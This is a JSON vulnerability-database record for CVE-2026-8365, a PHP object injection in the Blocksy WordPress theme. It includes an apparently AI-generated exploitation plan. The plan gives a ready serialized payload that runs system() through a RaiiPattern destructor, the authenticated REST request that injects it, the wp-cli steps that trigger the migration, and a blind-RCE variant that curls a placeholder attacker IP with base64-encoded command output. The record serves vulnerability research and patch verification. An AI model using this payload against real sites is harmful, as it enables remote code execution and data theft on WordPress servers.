[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fpZSXGdwODm7jpRZLP7wjdvm2Vu3s6J7K2dGba_x5mJs":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":8,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":8,"research_vulnerable_code":8,"research_fix_diff":8,"research_exploit_outline":8,"research_model_used":26,"research_started_at":27,"research_completed_at":28,"research_error":8,"poc_status":8,"poc_video_id":8,"poc_summary":8,"poc_steps":8,"poc_tested_at":8,"poc_wp_version":8,"poc_php_version":8,"poc_playwright_script":8,"poc_exploit_code":8,"poc_has_trace":23,"poc_model_used":8,"poc_verification_depth":8,"poc_exploit_code_gated":23,"source_links":29},"CVE-2026-8365","blocksy-authenticated-contributor-php-object-injection-via-deserialization-of-untrusted-data-via-blocksymeta-rest-api-fi","Blocksy \u003C= 2.1.41 - Authenticated (Contributor+) PHP Object Injection via Deserialization of Untrusted Data via 'blocksy_meta' REST API Field","The Blocksy theme for WordPress is vulnerable to PHP Object Injection leading to Remote Code Execution via the 'blocksy_meta' REST API field and the V200 database migration in versions up to and including 2.1.35. This is due to insufficient input sanitization in the blocksy_sanitize_post_meta_options() function, which only blocks values containing '\u003C' or '>' and does not prevent serialized PHP object strings from being stored in post meta, combined with the SearchReplacer::run_recursively() function unconditionally deserializing all string values via @unserialize() during migration without restricting allowed classes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject a serialized Blocksy\\RaiiPattern object into post meta that, when the V200 migration runs on an upgraded site, is deserialized and triggers RaiiPattern::__destruct(), which executes arbitrary PHP callables via call_user_func().",null,"blocksy","\u003C=2.1.41","2.1.42","high",8.8,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Deserialization of Untrusted Data","2026-06-08 20:11:29","2026-06-09 08:29:40",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Ffd216743-ce8d-4632-9fd1-d63502c2dfcd?source=api-prod",1,[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-8365 (Blocksy PHP Object Injection)\n\n## 1. Vulnerability Summary\nThe Blocksy theme (\u003C= 2.1.41) is vulnerable to **PHP Object Injection** leading to **Remote Code Execution (RCE)**. The vulnerability exists because the `blocksy_sanitize_post_meta_options()` function fails to prevent serialized PHP strings from being stored in the `blocksy_meta` post meta field (it only filters `\u003C` and `>`). \n\nWhen a site is \"upgraded\" or the V200 migration is triggered, the `SearchReplacer::run_recursively()` function processes these meta values and calls `@unserialize()` on them without class restrictions. This allows a Contributor-level user to inject a malicious serialized `Blocksy\\RaiiPattern` object, which executes arbitrary PHP via `call_user_func()` in its `__destruct()` method.\n\n## 2. Attack Vector Analysis\n*   **Target Endpoint:** WordPress REST API post update endpoint (`\u002Fwp\u002Fv2\u002Fposts\u002F\u003Cid>`).\n*   **Vulnerable Parameter:** The `blocksy_meta` field within the REST request body.\n*   **Authentication Required:** Authenticated, Contributor role or higher (anyone with permission to edit\u002Fcreate posts).\n*   **Preconditions:**\n    1.  The attacker must have a valid Contributor session.\n    2.  The \"V200 migration\" must be triggered. In practice, this migration usually runs when the theme version is updated or when the `blocksy_version` option in the database is lower than `2.0.0`.\n\n## 3. Code Flow\n1.  **Entry Point (Injection):**\n    *   A Contributor sends a `POST` or `PUT` request to `\u002Fwp\u002Fv2\u002Fposts\u002F\u003Cid>`.\n    *   The request includes `blocksy_meta` containing a serialized `Blocksy\\RaiiPattern` object.\n    *   `blocksy_sanitize_post_meta_options()` is called. It checks for HTML tags (`\u003C`, `>`) but allows the serialized string.\n    *   The payload is saved to the `wp_postmeta` table under the key `blocksy_meta`.\n\n2.  **Trigger (Migration):**\n    *   The theme checks the `blocksy_version` option.\n    *   If a migration to V2.0.0 is needed, `SearchReplacer::run_recursively()` is invoked on the post meta.\n    *   **Sink:** Inside `run_recursively()`, `@unserialize($meta_value)` is called.\n\n3.  **Execution (POP Chain):**\n    *   The `unserialize()` call instantiates `Blocksy\\RaiiPattern`.\n    *   When the PHP script finishes (or the object is destroyed), `Blocksy\\RaiiPattern::__destruct()` is triggered.\n    *   The destructor calls `call_user_func($this->callback, $this->parameter)`.\n\n## 4. Nonce Acquisition Strategy\nThe WordPress REST API requires a `wp_rest` nonce for state-changing requests (POST\u002FPUT\u002FPATCH) when using session-based authentication.\n\n1.  **Login:** Use `wp_cli` to ensure a Contributor user exists and use the `browser_navigate` tool to log in.\n2.  **Extraction:** The standard WordPress REST API nonce is usually available in the `wpApiSettings` JavaScript object on admin pages.\n3.  **Action:**\n    *   Navigate to `\u002Fwp-admin\u002F`.\n    *   Run `browser_eval(\"window.wpApiSettings?.nonce\")`.\n    *   Store this as the `X-WP-Nonce` header for the REST API request.\n\n## 5. Exploitation Strategy\n\n### Step 1: Craft the Payload\nThe `Blocksy\\RaiiPattern` class (inferred from description) requires two properties: a callback and a parameter.\n*   **Target Function:** `system` or `passthru`.\n*   **Parameter:** `whoami > \u002Ftmp\u002Frce.txt`.\n*   **Serialized String:** `O:20:\"Blocksy\\RaiiPattern\":2:{s:8:\"callback\";s:6:\"system\";s:9:\"parameter\";s:23:\"whoami > \u002Ftmp\u002Frce.txt\";}` (Note: Actual property names might vary; if properties are private\u002Fprotected, they require null-byte padding).\n\n### Step 2: Inject via REST API\nUsing the `http_request` tool:\n*   **Method:** `POST`\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-json\u002Fwp\u002Fv2\u002Fposts\u002F\u003CPOST_ID>`\n*   **Headers:**\n    *   `Content-Type: application\u002Fjson`\n    *   `X-WP-Nonce: \u003CEXTRACTED_NONCE>`\n*   **Body:**\n    ```json\n    {\n      \"blocksy_meta\": \"O:20:\\\"Blocksy\\\\RaiiPattern\\\":2:{s:8:\\\"callback\\\";s:6:\\\"system\\\";s:9:\\\"parameter\\\";s:23:\\\"whoami > \u002Ftmp\u002Frce.txt\\\";}\"\n    }\n    ```\n\n### Step 3: Trigger the Migration\nThe migration is likely triggered by an administrator visiting the dashboard or by the theme initialization if the version is old.\n1.  **Force Migration State:** Use `wp_cli` to set the theme version back:\n    `wp option update blocksy_version 1.9.9`\n2.  **Trigger:** Use `http_request` or `browser_navigate` to visit the `\u002Fwp-admin\u002F` page as an Administrator. This should trigger the `SearchReplacer` logic.\n\n## 6. Test Data Setup\n1.  **Create Contributor:** \n    `wp user create attacker attacker@example.com --role=contributor --user_pass=password`\n2.  **Create Post:**\n    `wp post create --post_type=post --post_status=publish --post_author=\u003CATTACKER_ID> --post_title=\"Vuln Post\"`\n    (Store the resulting ID as `\u003CPOST_ID>`).\n3.  **Verify Theme:** Ensure Blocksy \u003C= 2.1.41 is active.\n\n## 7. Expected Results\n*   The REST API call should return `200 OK`, and the `blocksy_meta` field in the response should contain the serialized string.\n*   After triggering the migration, the file `\u002Ftmp\u002Frce.txt` should be created on the server, containing the output of the `whoami` command (typically `www-data`).\n\n## 8. Verification Steps\n1.  **Check Meta Injection:**\n    `wp post meta get \u003CPOST_ID> blocksy_meta`\n2.  **Check RCE Execution:**\n    `ls -l \u002Ftmp\u002Frce.txt`\n    `cat \u002Ftmp\u002Frce.txt`\n\n## 9. Alternative Approaches\n*   **Different POP Chain:** If `Blocksy\\RaiiPattern` is unavailable, check for other loaded classes with `__destruct` or `__wakeup` sinks (e.g., standard WordPress core chains if version allows).\n*   **Blind RCE:** If file writing is restricted, use `curl` or `nslookup` to an external collaborator to verify execution:\n    `s:9:\"parameter\";s:45:\"curl http:\u002F\u002F\u003CYOUR_IP>\u002F$(whoami | base64)\";`\n*   **Direct Migration Call:** If the V200 migration can be triggered via a specific AJAX action (common in modern themes for \"Database Update\" buttons), identify that AJAX action and trigger it directly with a valid Admin nonce.","gemini-3-flash-preview","2026-06-26 01:51:46","2026-06-26 01:52:24",{"type":30,"vulnerable_version":31,"fixed_version":11,"vulnerable_browse":32,"vulnerable_zip":8,"fixed_browse":33,"fixed_zip":8,"all_tags":34},"theme","2.1.41","https:\u002F\u002Fthemes.trac.wordpress.org\u002Fbrowser\u002Fblocksy\u002F2.1.41","https:\u002F\u002Fthemes.trac.wordpress.org\u002Fbrowser\u002Fblocksy\u002F2.1.42","https:\u002F\u002Fthemes.trac.wordpress.org\u002Fbrowser\u002Fblocksy"]